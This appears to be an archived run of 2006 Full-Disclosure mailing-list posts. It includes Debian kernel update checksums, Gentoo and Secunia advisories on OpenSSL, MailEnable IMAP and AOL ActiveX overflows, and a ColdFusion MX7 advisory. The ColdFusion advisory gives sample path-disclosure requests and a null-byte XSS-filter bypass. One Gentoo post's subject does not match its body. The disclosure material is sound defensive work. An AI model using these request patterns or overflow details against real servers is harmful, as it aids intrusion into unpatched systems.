http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-32-smp_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 212830 8b7c179ad04d28d4351ef0335a71f846 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-64_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 212172 964f4250b6228da3ffb42506831f952d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-64-smp_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 211598 0c3a2b31ce52efdd3d25892bc8dbe4a7 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-32_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 16038152 f4f0f9265fbe9759a8226791494c3d87 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-32-smp_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 16945098 7f48536252a7f397d4c3ccaa5c27acd1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-64_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 17488884 be22fbe687ccbdc74e46d82a50aa67e8 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-64-smp_2.6.8-6sarge6_hppa.deb Size/MD5 checksum: 18323104 bc84726f1d311731839a482470eac180 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8328 437a9e1f12ef5c44488123133be693f9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8392 f350a2c8648dba4b9131bb6727f62a3c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8354 4c2ac89127aca46b3c7caa94627cb790 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8422 90d9c28d0597fd071783627dfeb5a47d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 3100586 fe42f8372f9bd4e7aede89524752b258 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 202016 f39ab5662025051f1a5f4071f98b8326 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 201574 02242af3e14a45afbce321f9da26c4c3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 201736 6266254168512c6844bfc36c7c99baf1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 201358 0cf4e051888b2f2b447784ee95bd16bf http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8322 a4ef844e4a9a825b6d4e8458124b4c70 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8392 00f9abeb1db174321d20e5195476bf4d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8350 4cda64538a8aded969f0737e8841bb8f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 8420 8fdcb1a497de06056e444fe666cd7eb3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 21492518 9ebc1de753630b3e7bc1375cebe40baf http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 22143884 c8e8efe7d0e8e8bd5c7d9848c238da39 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 21414040 436463ce77158481c193d7a393081525 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley-smp_2.6.8-14sarge6_ia64.deb Size/MD5 checksum: 22159592 e78bd1c46d232ac6fbca8359e0b17217 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-amiga_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3307308 19f3b7edc060d43e53340d9089d75f85 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-atari_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3105070 c71f6661668cc4b7d24a74d05c61ec0f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-bvme6000_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3017094 038b505e49d176ff9c6c2c29008c81b6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-hp_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 2990546 fd8a9013b726c7cdd3af0ffc788ed464 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mac_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3176400 4f07b7599c4bf68fce66dc1b3d50027e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme147_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 2981206 74ac4e38ff78db512904f6fde1942d7d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme16x_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3050512 290c886ef124a7e8e0081c787dac1e02 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-q40_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 3111864 bed2bdc831f4aceb2cdab00dc6c9ff74 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-sun3_2.6.8-4sarge6_m68k.deb Size/MD5 checksum: 2996748 072ad661017bb265f727971d64d22713 IBM S/390 architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-3_2.6.8-5sarge6_s390.deb Size/MD5 checksum: 5088210 67913b4030c03602ab7b995e18a61ff0 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390_2.6.8-5sarge6_s390.deb Size/MD5 checksum: 2983156 f075548343f44a55fa86950ab1acfd4e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390-tape_2.6.8-5sarge6_s390.deb Size/MD5 checksum: 1145348 c985c3054acf6d23de65e2b1e8abceb1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-3-s390x_2.6.8-5sarge6_s390.deb Size/MD5 checksum: 3190572 3761b55bbeebbb0f95ead41ed1c63645 Sun Sparc architecture: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-3_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 6914 80f27150809880437b8eea7cdacf86aa http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 2892460 fe5a212dc746cb2cd3b6f89cd3ec0910 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc32_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 111930 47217a4688947b3541b160442c67c4e3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 146746 f7175f6a595c089d70cdcbc53da66741 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-3-sparc64-smp_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 147416 3ba6d4524ee7f978629105f03a6cb888 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc32_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 4556682 2e8d6bb2402f6eae4ca1c7d84fc038e5 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 7436722 ad82ebcd955994cf9ba0a888665f7bc3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-3-sparc64-smp_2.6.8-15sarge6_sparc.deb Size/MD5 checksum: 7638170 97ea4b531b25d0184afe15bcf048dd61 PowerPC architecture: http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408362 b1e56a6aa08127744684207cc77a5b18 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408258 9795e94f5386b04d96c1ed51b358152e http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408940 a7062df43f196e20ac34142bcb63094c http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408246 3039aa321500765dd3a90fdd02cabaf5 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408556 2730f0ac614407f07d4e3b89168ed1d0 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 408344 0548e0547f8956e0b78154be37604c42 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-3_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 5149586 138c219551722913760971e091ee01fa http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13587372 0eccec26ecc77a85a92882d85cd4dee7 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power3-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13940646 0d090a94b0d5d0087d03336eec38aafb http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13573608 1bf18727501cba237540f89661536a5d http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-power4-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13928674 3364e627dcce97aceecb1f3d2993237f http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13605310 6f5cf3c2d1db6cc19247d16d7d6ffdab http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-3-powerpc-smp_2.6.8-12sarge6_powerpc.deb Size/MD5 checksum: 13860206 3d8bb4b7c4bdc8b34c7a840c3e9e894b These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFfHaTXm3vHE4uyloRAt48AKDhGdvusokDO/BPuDHM15wixccR5ACfUdz9 5+NObCWgNomujaT6ANT0dU0= =VjZz -----END PGP SIGNATURE----- From ge at linuxbox.org Sun Dec 10 22:31:18 2006 From: ge at linuxbox.org (Gadi Evron) Date: Sun, 10 Dec 2006 16:31:18 -0600 (CST) Subject: [Full-disclosure] looking for security community input Message-ID: Hi guys. This January a couple hundred people from the net-ops world, anti virus, anti spam, law enforcement, etc. are getting together. I'd appreciate if any of you can send me input (off list, if not relevant to generate discussion) on what the security community at large, rather than just the security operations community, sees and is pre-occupied by. Specifically on subjects such as: 1. Attacks. 2. Law enforcement. 3. DDoS. 4. Botnets. 5. Financial fraud. 6. Spam. 7. End users (bots?) 8. Corporate espionage. 9. Incident response 10. Your topic here? And whats specifically you've had issues with and/or are looking for solutions for or for what others are doing when it comes to security and security related issues. Please note, this is about security operations and Internet-wide threats which affect us all, more than local corporate security issues. We will relay information back after the workshop, likely in early February. To ask specific questions and/or direct us in specific directions, pick and choose: http://isotf.org/isoi2.html Thanks, Gadi. From brett.moore at security-assessment.com Sun Dec 10 22:35:25 2006 From: brett.moore at security-assessment.com (Brett Moore) Date: Mon, 11 Dec 2006 11:35:25 +1300 Subject: [Full-disclosure] [SBDA] - ColdFusion MX7 - Multiple Vulnerabilities Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DE827@pukeko.smb2go.net> Just clearing stuff out before Christmas. ======================================================================== = ColdFusion MX7 - Multiple Vulnerabilities = = Vendor Website: = http://www.Adobe.com = = Affected Software: = ColdFusion MX7 (and possibly MX6) = = Public disclosure on Monday December 11, 2006 ======================================================================== == Overview == This advisory discloses three separate security issues in ColdFusion MX7. * Server Path Disclosure * It is possible to cause the server to disclose the local path by making an invalid request. This information could be used to aide in other file or path based attacks. The request must be for an existing file, that has an extension not handled by the web server. (ie: not asp,aspx). The request must be terminated with either of the following; /.jws /.cfm /.cfml /.cfc Some example requests are; http://serverip/page1.htm/a.cfm http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm http://serverip/jrunscripts/jrun.ini/a.cfm http://serverip/jrunscripts/jrunserver.store/a.cfm http://serverip/jrunscripts/readme.txt/a.cfm This has been confirmed against installs that do NOT have debugging or robust exception information turned on. Sending a request in this format returns a message similar to; Error parsing the Tag Library Descriptor file:/d:/sekretpath/hidden/page1.htm/.. * Internal IP Address Disclosure * It is possible to cause the server to disclose the internal network IP address of the host. This information could be used to aide in other network based attacks. Making a request to the /CFIDE/administrator/login.cfm page WITHOUT supplying a host, will result in the internal IP address of the server to be disclosed as part of an href tag. ------------------------------------------------------------------ GET /CFIDE/administrator/login.cfm HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Thu, 09 Nov 2006 05:44:02 GMT ------------------------------------------------------------------ * Cross Site Scripting Protection Bypass * ColdFusion MX7 appears to have built in protection against cross site scripting attacks, and will replace By inserting a %00 within the == Solutions == Currently, the issues outlined in the report are being considered for the next major version of ColdFusion - the release date is currently not finalized. There is currently no plan to release security bulletins for any of the issues from the report == Credit == Discovered and advised to Adobe November 11, 2006 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. From stacksmasher at gmail.com Mon Dec 11 00:23:47 2006 From: stacksmasher at gmail.com (Stack Smasher) Date: Sun, 10 Dec 2006 19:23:47 -0500 Subject: [Full-disclosure] looking for security community input In-Reply-To: References: Message-ID: <591fd0b20612101623m18ed7f73kcc89b0882345f529@mail.gmail.com> A few years ago you would of had no problem getting a bunch of people to bite on a request like this, but now all of the things you are asking for is information that is worth allot of money. The security environment is changing and just like the shift in the bad guy community towards nefarious deeds for profit, I need to feed and cloth my children and if you want me to help you its going to cost you, big time. The sponsor of this little shindig is Microsoft and they have $46 Billion in cash so they can afford it. Stacksmasher On 12/10/06, Gadi Evron wrote: > > Hi guys. > > This January a couple hundred people from the net-ops world, anti virus, > anti spam, law enforcement, etc. are getting together. > > I'd appreciate if any of you can send me input (off list, if not relevant > to generate discussion) on what the security community at large, rather > than just the security operations community, sees and is pre-occupied by. > > Specifically on subjects such as: > 1. Attacks. > 2. Law enforcement. > 3. DDoS. > 4. Botnets. > 5. Financial fraud. > 6. Spam. > 7. End users (bots?) > 8. Corporate espionage. > 9. Incident response > 10. Your topic here? > > And whats specifically you've had issues with and/or are looking for > solutions for or for what others are doing when it comes to security and > security related issues. Please note, this is about security operations > and Internet-wide threats which affect us all, more than local corporate > security issues. > > We will relay information back after the workshop, likely in early > February. > > To ask specific questions and/or direct us in specific directions, pick > and choose: > http://isotf.org/isoi2.html > > Thanks, > > Gadi. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- "If you see me laughing, you better have backups" -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/5ac13b5a/attachment.html From juha-matti.laurio at netti.fi Mon Dec 11 01:00:42 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Mon, 11 Dec 2006 03:00:42 +0200 (EET) Subject: [Full-disclosure] Another, different MS Word 0-day vulnerability reported Message-ID: <29974843.1455861165798843446.JavaMail.juha-matti.laurio@netti.fi> The updated information from Microsoft states Word 2000 as affected too. Vulnerable product versions: MS Word 2000 MS Word 2002 (a part of Office XP) MS Word 2003 MS Word Viewer 2003 http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-zero-day.aspx - Juha-Matti From falco at gentoo.org Mon Dec 11 10:01:43 2006 From: falco at gentoo.org (Raphael Marichez) Date: Mon, 11 Dec 2006 11:01:43 +0100 Subject: [Full-disclosure] ERRATA: [ GLSA 200612-03 ] GnuPG: Multiple vulnerabilities Message-ID: <20061211100143.GG1755@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE] GLSA 200612-03:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GnuPG: Multiple vulnerabilities Date: December 10, 2006 Updated: December 10, 2006 Bugs: #156476, #156947 ID: 200612-03:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata ====== The Resolution proposed in the original version of this Security Advisory did not correctly address the issue for users who also have GnuPG 1.9 installed. The corrected sections appear below. Resolution ========== All GnuPG users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose "=app-crypt/gnupg-1.4*" Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061211/e8ba0b29/attachment.bin From remove-vuln at secunia.com Mon Dec 11 10:04:58 2006 From: remove-vuln at secunia.com (Secunia Research) Date: Mon, 11 Dec 2006 11:04:58 +0100 Subject: [Full-disclosure] Secunia Research: MailEnable IMAP Service Buffer Overflow Vulnerability Message-ID: <1165831498.2682.233.camel@ts4.intnet> ====================================================================== Secunia Research 11/12/2006 - MailEnable IMAP Service Buffer Overflow Vulnerability - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software MailEnable Professional Edition Version 2.35. NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly Critical Impact: System Access Where: From Remote ====================================================================== 3) Vendor's Description of Software "MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effective mail services." Product Link: http://www.mailenable.com/default.asp ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in MailEnable, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error when processing data sent to the IMAP server. This can be exploited to cause a stack-based buffer overflow by first sending a command in the "Not Authenticated" state (e.g. "login" command) with a specially crafted parameter to make the IMAP service wait for more incoming data and then sending an overly long string (greater than 512 bytes). Successful exploitation allows execution of arbitrary code. ====================================================================== 5) Solution Apply hotfix ME-10025: http://www.mailenable.com/hotfix/ME-10025.EXE ====================================================================== 6) Time Table 08/12/2006 - Vendor notified. 08/12/2006 - Vendor response with hotfix information. 11/12/2006 - Public disclosure. ====================================================================== 7) Credits Discovered by JJ Reyes, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-6423 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-73/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From remove-vuln at secunia.com Mon Dec 11 10:09:44 2006 From: remove-vuln at secunia.com (Secunia Research) Date: Mon, 11 Dec 2006 11:09:44 +0100 Subject: [Full-disclosure] Secunia Research: AOL CDDBControl ActiveX Control "SetClientInfo()" Buffer Overflow Message-ID: <1165831784.2682.238.camel@ts4.intnet> ====================================================================== Secunia Research 08/12/2006 - AOL CDDBControl ActiveX Control "SetClientInfo()" Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 Vendor Statement.....................................................8 References...........................................................9 About Secunia.......................................................10 Verification........................................................11 ====================================================================== 1) Affected Software - America Online 7.0 revision 4114.563 - AOL 8.0 revision 4129.230 - AOL 9.0 Security Edition revision 4156.910 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software Product Link: http://downloads.channel.aol.com/windowsproducts ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in AOL, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to a boundary error in the "CDDBControlAOL.CDDBAOLControl" ActiveX control (cddbcontrol.dll) when processing "ClientId" arguments passed to the "SetClientInfo()" method. This can be exploited to cause a stack-based buffer overflow by passing an overly long string (more than 256 bytes). Successful exploitation allows execution of arbitrary code when a user visits a malicious website with Internet Explorer. In order to exploit the vulnerability, a certain registry value has to be set to "1111". This is not set by default, but can be set up automatically by first instantiating the bundled CerberusCDPlayer ActiveX control. ====================================================================== 5) Solution Updates are automatically available for AOL 9.x users when logging into the AOL service. ====================================================================== 6) Time Table 23/11/2006 - Vendor notified. 24/11/2006 - Provided additional information to the vendor. 24/11/2006 - Vendor response. 08/12/2006 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) Vendor Statement Overview AOL has recently been made aware of a security vulnerability present in the AOL CDDB ActiveX control. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary code on a vulnerable system. Affected Products and Applications All AOL software versions are affected by this issue. Solutions 1. Users of AOL 9.0 or AOL 9.0 Security Edition are recommended to log in to the AOL service and a fix will be seamlessly applied to their system. 2. Users using versions of AOL that are older than 9.0 are strongly recommended to upgrade to the latest version of AOL 9.0 Security Edition. Acknowledgements AOL would like to thank Secunia for their efforts in identifying and responsibly reporting this issue. ====================================================================== 9) References The Common Vulnerabilities and Exposures (CVE) project has not currently assigned a CVE identifier for the security issue. ====================================================================== 10) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 11) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-69/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From juha-matti.laurio at netti.fi Mon Dec 11 21:59:40 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Mon, 11 Dec 2006 23:59:40 +0200 (EET) Subject: [Full-disclosure] The newest Word flaw is due to malformed data structure handling Message-ID: <22313902.121061165874381032.JavaMail.juha-matti.laurio@netti.fi> Related to the newest MS Word 0-day http://blogs.technet.com/msrc/archive/2006/12/10/new-report-of-a-word-zero-day.aspx US-CERT Vulnerability Note VU#166700 released today lists the following new technical detail: "Microsoft Word fails to properly handle malformed data structures allowing memory corruption to occur." http://www.kb.cert.org/vuls/id/166700 - Juha-Matti From falco at gentoo.org Mon Dec 11 23:32:54 2006 From: falco at gentoo.org (Raphael Marichez) Date: Tue, 12 Dec 2006 00:32:54 +0100 Subject: [Full-disclosure] [ GLSA 200612-09 ] MadWifi: Kernel driver buffer overflow Message-ID: <20061211233254.GC7955@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: AMD64 x86 emulation base libraries: OpenSSL multiple vulnerabilities Date: December 11, 2006 Bugs: #152640 ID: 200612-11 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== OpenSSL contains multiple vulnerabilities including the possible execution of remote arbitrary code. Background ========== OpenSSL is a toolkit implementing the Secure Sockets Layer, Transport Layer Security protocols and a general-purpose cryptography library. The x86 emulation base libraries for AMD64 contain a vulnerable version of OpenSSL. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 emul-linux-x86-baselibs < 2.5.5 >= 2.5.5 ------------------------------------------------------------------- # Package 1 only applies to AMD64 users. Description =========== Tavis Ormandy and Will Drewry, both of the Google Security Team, discovered that the SSL_get_shared_ciphers() function contains a buffer overflow vulnerability, and that the SSLv2 client code contains a flaw leading to a crash. Additionally, Dr. Stephen N. Henson found that the ASN.1 handler contains two Denial of Service vulnerabilities: while parsing an invalid ASN.1 structure and while handling certain types of public key. Impact ====== An attacker could trigger the buffer overflow by sending a malicious suite of ciphers to an application using the vulnerable function, and thus execute arbitrary code with the rights of the user running the application. An attacker could also consume CPU and/or memory by exploiting the Denial of Service vulnerabilities. Finally, a malicious server could crash a SSLv2 client through the SSLv2 vulnerability. Workaround ========== There is no known workaround at this time. Resolution ========== All AMD64 x86 emulation base libraries users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-baselibs-2.5.5" References 